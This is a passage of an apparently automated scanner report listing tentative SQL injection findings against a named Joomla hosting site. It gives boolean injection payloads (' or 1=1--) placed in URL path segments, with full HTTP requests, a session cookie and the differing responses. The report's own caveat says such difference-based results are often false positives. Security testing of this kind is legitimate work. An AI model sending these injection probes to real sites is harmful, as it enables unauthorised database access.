<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au/index.php/component10454269' or 1=2-- /option,com_webhosting/Itemid,58/catid,19/" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />

<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>404</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<script type="text/javascript" src="/media/system/js/mootools.js"></script>
<script type="text/javascript" src="/media/system/js/caption.js"></script>
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) starts here -->

<style type="text/css" media="all">
   @import "http://networkpresence.com.au/plugins/content/jw_allvideos/templates/Default/template_css.css";
</style>
       
<script type="text/javascript" src="http://networkpresence.com.au/plugins/content/jw_allvideos/players/jw_allvideos_scripts.php"></script>
       
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) ends here -->
<!-- JoomlaWorks "Frontpage Slideshow" v1.7.2 starts here -->
   <link rel="stylesheet" href="http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php?w=520
...[SNIP]...

1.7. http://networkpresence.com.au/index.php/component/option,com_webhosting/Itemid,58/catid,19/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://networkpresence.com.au
Path:   /index.php/component/option,com_webhosting/Itemid,58/catid,19/

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 15648684'%20or%201%3d1--%20 and 15648684'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.php/component/option,com_webhosting15648684'%20or%201%3d1--%20/Itemid,58/catid,19/ HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24; com_jw_fpss=true

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:03:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:03:54 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 37580
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au/index.php/component/option,com_webhosting/Itemid,58/catid,19/" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />
<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>Cloud Plans</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link type='text/css' href='http://networkpresence.com.au/modules/mod_swmenufree/styles/menu.css' rel='stylesheet' />
<script type="text/javascript" src="http://networkpresence.com.au/modules/mod_swmenufree/transmenu_Packed.js"></script>


<link rel="shortcut icon" href="/favicon.ico">
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/aurora/css/template.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/templates/aurora/css/blue.css" type="text/css" />

<!--[if IE 6]>
<link href="/templates/aurora/css/ie6.css" rel="stylesheet" type="text/css" />
<![endif]-->

<!--[if IE 7]>
<link href="/templates/aurora/css/ie7.css" rel="stylesheet" type="text/css" />
<![endif]-->

<style type="te
...[SNIP]...

Request 2

GET /index.php/component/option,com_webhosting15648684'%20or%201%3d2--%20/Itemid,58/catid,19/ HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24; com_jw_fpss=true

Response 2

HTTP/1.1 404 NOT FOUND
Date: Tue, 19 Jul 2011 02:03:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:03:56 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23737
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au/index.php/component/option,com_webhosting15648684' or 1=2-- /Itemid,58/catid,19/" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />

<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>404</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<script type="text/javascript" src="/media/system/js/mootools.js"></script>
<script type="text/javascript" src="/media/system/js/caption.js"></script>
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) starts here -->

<style type="text/css" media="all">
   @import "http://networkpresence.com.au/plugins/content/jw_allvideos/templates/Default/template_css.css";
</style>
       
<script type="text/javascript" src="http://networkpresence.com.au/plugins/content/jw_allvideos/players/jw_allvideos_scripts.php"></script>
       
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) ends here -->
<!-- JoomlaWorks "Frontpage Slideshow" v1.7.2 starts here -->
   <link rel="stylesheet" href="http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php?w=520
...[SNIP]...

1.8. http://networkpresence.com.au/index.php/component/option,com_webhosting/Itemid,58/catid,19/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://networkpresence.com.au
Path:   /index.php/component/option,com_webhosting/Itemid,58/catid,19/

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 16980299'%20or%201%3d1--%20 and 16980299'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.php/component/option,com_webhosting/Itemid,5816980299'%20or%201%3d1--%20/catid,19/ HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24; com_jw_fpss=true

Response 1

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:04:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:04:29 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 28359
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<title>Network Presence - Australian Based Virtual Private Server (VPS) Hosting</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link type='text/css' href='http://networkpresence.com.au/modules/mod_swmenufree/styles/menu.css' rel='stylesheet' />
<script type="text/javascript" src="http://networkpresence.com.au/modules/mod_swmenufree/transmenu_Packed.js"></script>


<link rel="shortcut icon" href="/favicon.ico">
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/aurora/css/template.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/templates/aurora/css/blue.css" type="text/css" />

<!--[if IE 6]>
<link href="/templates/aurora/css/ie6.css" rel="stylesheet" type="text/css" />
<![endif]-->

<!--[if IE 7]>
<link href="/templates/aurora/css/ie7.css" rel="stylesheet" type="text/css" />
<![endif]-->

<style type="text/css">
#banner {
background:url(/templates/aurora/images/blue/headimg_blue.jpg) no-repeat;
}
</style>



</head>

<body class="mainbody">
   <div id="wrapper">
       <div id="mainhead1">
        <div id="flash">
       <div class="moduletable">
                   <table width="100%" border="0" cellpadding="0" cellspacing="1"><tr><td nowrap="nowrap"><a href="/" class="mainlevel" >Home</a><span class="mainlevel"> | </span><a href="http://www.networkpresence.com.au/index.php/Log-in.html" class="mainlevel" >Log-In</a><span class="mainlevel"> | </span><a href="http://netpr.es/register" class="mainlevel" >Register</a></td></tr></table>        </div>
   
               </div>
               <div id="logo">
<!-- <a href="/index.php"><img src="/templates//images//logo.png" style="border:0;" alt=""/></a>-->
</div>

           



</div>

               <div id="horiznav">
                   
<!--swMenuFree5.0J_1.5 transmenu by http://www.swmenupro.com-->
<div id="wrap" cla
...[SNIP]...

Request 2

GET /index.php/component/option,com_webhosting/Itemid,5816980299'%20or%201%3d2--%20/catid,19/ HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24; com_jw_fpss=true

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:04:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:04:30 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 28303
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<title>Network Presence</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link type='text/css' href='http://networkpresence.com.au/modules/mod_swmenufree/styles/menu.css' rel='stylesheet' />
<script type="text/javascript" src="http://networkpresence.com.au/modules/mod_swmenufree/transmenu_Packed.js"></script>


<link rel="shortcut icon" href="/favicon.ico">
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/aurora/css/template.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/templates/aurora/css/blue.css" type="text/css" />

<!--[if IE 6]>
<link href="/templates/aurora/css/ie6.css" rel="stylesheet" type="text/css" />
<![endif]-->

<!--[if IE 7]>
<link href="/templates/aurora/css/ie7.css" rel="stylesheet" type="text/css" />
<![endif]-->

<style type="text/css">
#banner {
background:url(/templates/aurora/images/blue/headimg_blue.jpg) no-repeat;
}
</style>



</head>

<body class="mainbody">
   <div id="wrapper">
       <div id="mainhead1">
        <div id="flash">
       <div class="moduletable">
                   <table width="100%" border="0" cellpadding="0" cellspacing="1"><tr><td nowrap="nowrap"><a href="/" class="mainlevel" >Home</a><span class="mainlevel"> | </span><a href="http://www.networkpresence.com.au/index.php/Log-in.html" class="mainlevel" >Log-In</a><span class="mainlevel"> | </span><a href="http://netpr.es/register" class="mainlevel" >Register</a></td></tr></table>        </div>
   
               </div>
               <div id="logo">
<!-- <a href="/index.php"><img src="/templates//images//logo.png" style="border:0;" alt=""/></a>-->
</div>

           



</div>

               <div id="horiznav">
                   
<!--swMenuFree5.0J_1.5 transmenu by http://www.swmenupro.com-->
<div id="wrap" class="menu" align="center">
<table cellspacing="0"
...[SNIP]...

1.9. http://networkpresence.com.au/index.php/component/option,com_webhosting/Itemid,58/catid,19/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://networkpresence.com.au
Path:   /index.php/component/option,com_webhosting/Itemid,58/catid,19/

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payloads 67726407'%20or%201%3d1--%20 and 67726407'%20or%201%3d2--%20 were each submitted in the REST URL parameter 5. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.php/component/option,com_webhosting/Itemid,58/catid,1967726407'%20or%201%3d1--%20/ HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24; com_jw_fpss=true

Response 1

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:05:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:05:01 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 25057
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<title>Network Presence - Australian Based Virtual Private Server (VPS) Hosting</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link type='text/css' href='http://networkpresence.com.au/modules/mod_swmenufree/styles/menu.css' rel='stylesheet' />
<script type="text/javascript" src="http://networkpresence.com.au/modules/mod_swmenufree/transmenu_Packed.js"></script>


<link rel="shortcut icon" href="/favicon.ico">
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/aurora/css/template.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/templates/aurora/css/blue.css" type="text/css" />

<!--[if IE 6]>
<link href="/templates/aurora/css/ie6.css" rel="stylesheet" type="text/css" />
<![endif]-->

<!--[if IE 7]>
<link href="/templates/aurora/css/ie7.css" rel="stylesheet" type="text/css" />
<![endif]-->

<style type="text/css">
#banner {
background:url(/templates/aurora/images/blue/headimg_blue.jpg) no-repeat;
}
</style>



</head>

<body class="mainbody">
   <div id="wrapper">
       <div id="mainhead1">
        <div id="flash">
       <div class="moduletable">
                   <table width="100%" border="0" cellpadding="0" cellspacing="1"><tr><td nowrap="nowrap"><a href="/" class="mainlevel" >Home</a><span class="mainlevel"> | </span><a href="http://www.networkpresence.com.au/index.php/Log-in.html" class="mainlevel" >Log-In</a><span class="mainlevel"> | </span><a href="http://netpr.es/register" class="mainlevel" >Register</a></td></tr></table>        </div>
   
               </div>
               <div id="logo">
<!-- <a href="/index.php"><img src="/templates//images//logo.png" style="border:0;" alt=""/></a>-->
</div>

           



</div>

               <div id="horiznav">
                   
<!--swMenuFree5.0J_1.5 transmenu by http://www.swmenupro.com-->
<d
...[SNIP]...

Request 2

GET /index.php/component/option,com_webhosting/Itemid,58/catid,1967726407'%20or%201%3d2--%20/ HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24; com_jw_fpss=true

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:05:01 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:05:02 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 24996
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<title>Cloud Plans</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link type='text/css' href='http://networkpresence.com.au/modules/mod_swmenufree/styles/menu.css' rel='stylesheet' />
<script type="text/javascript" src="http://networkpresence.com.au/modules/mod_swmenufree/transmenu_Packed.js"></script>


<link rel="shortcut icon" href="/favicon.ico">
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/aurora/css/template.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/templates/aurora/css/blue.css" type="text/css" />

<!--[if IE 6]>
<link href="/templates/aurora/css/ie6.css" rel="stylesheet" type="text/css" />
<![endif]-->

<!--[if IE 7]>
<link href="/templates/aurora/css/ie7.css" rel="stylesheet" type="text/css" />
<![endif]-->

<style type="text/css">
#banner {
background:url(/templates/aurora/images/blue/headimg_blue.jpg) no-repeat;
}
</style>



</head>

<body class="mainbody">
   <div id="wrapper">
       <div id="mainhead1">
        <div id="flash">
       <div class="moduletable">
                   <table width="100%" border="0" cellpadding="0" cellspacing="1"><tr><td nowrap="nowrap"><a href="/" class="mainlevel" >Home</a><span class="mainlevel"> | </span><a href="http://www.networkpresence.com.au/index.php/Log-in.html" class="mainlevel" >Log-In</a><span class="mainlevel"> | </span><a href="http://netpr.es/register" class="mainlevel" >Register</a></td></tr></table>        </div>
   
               </div>
               <div id="logo">
<!-- <a href="/index.php"><img src="/templates//images//logo.png" style="border:0;" alt=""/></a>-->
</div>

           



</div>

               <div id="horiznav">
                   
<!--swMenuFree5.0J_1.5 transmenu by http://www.swmenupro.com-->
<div id="wrap" class="menu" align="center">
<table cellspacing=
...[SNIP]...

1.10. http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://networkpresence.com.au
Path:   /modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 49404679'%20or%201%3d1--%20 and 49404679'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /modules49404679'%20or%201%3d1--%20/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php?w=520&h=308&sw=192 HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:02:09 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:02:10 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 37581
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au/index.php/component/option,com_webhosting/Itemid,58/catid,19/" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />
<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>Cloud Plans</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link type='text/css' href='http://networkpresence.com.au/modules/mod_swmenufree/styles/menu.css' rel='stylesheet' />
<script type="text/javascript" src="http://networkpresence.com.au/modules/mod_swmenufree/transmenu_Packed.js"></script>


<link rel="shortcut icon" href="/favicon.ico">
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/aurora/css/template.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/templates/aurora/css/blue.css" type="text/css" />

<!--[if IE 6]>
<link href="/templates/aurora/css/ie6.css" rel="stylesheet" type="text/css" />
<![endif]-->

<!--[if IE 7]>
<link href="/templates/aurora/css/ie7.css" rel="stylesheet" type="text/css" />
<![endif]-->

<style type="te
...[SNIP]...

Request 2

GET /modules49404679'%20or%201%3d2--%20/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php?w=520&h=308&sw=192 HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24

Response 2

HTTP/1.1 404 NOT FOUND
Date: Tue, 19 Jul 2011 02:02:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:02:11 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23748
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au/modules49404679' or 1=2-- /mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />

<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>404</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<script type="text/javascript" src="/media/system/js/mootools.js"></script>
<script type="text/javascript" src="/media/system/js/caption.js"></script>
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) starts here -->

<style type="text/css" media="all">
   @import "http://networkpresence.com.au/plugins/content/jw_allvideos/templates/Default/template_css.css";
</style>
       
<script type="text/javascript" src="http://networkpresence.com.au/plugins/content/jw_allvideos/players/jw_allvideos_scripts.php"></script>
       
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) ends here -->
<!-- JoomlaWorks "Frontpage Slideshow" v1.7.2 starts here -->
   <link rel="stylesheet" href="http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_cs
...[SNIP]...

1.11. http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://networkpresence.com.au
Path:   /modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 19827343'%20or%201%3d1--%20 and 19827343'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /modules/mod_fpslideshow19827343'%20or%201%3d1--%20/mod_fpslideshow/templates/Uncut/template_css.php?w=520&h=308&sw=192 HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:02:49 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:02:49 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 37581
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au/index.php/component/option,com_webhosting/Itemid,58/catid,19/" />
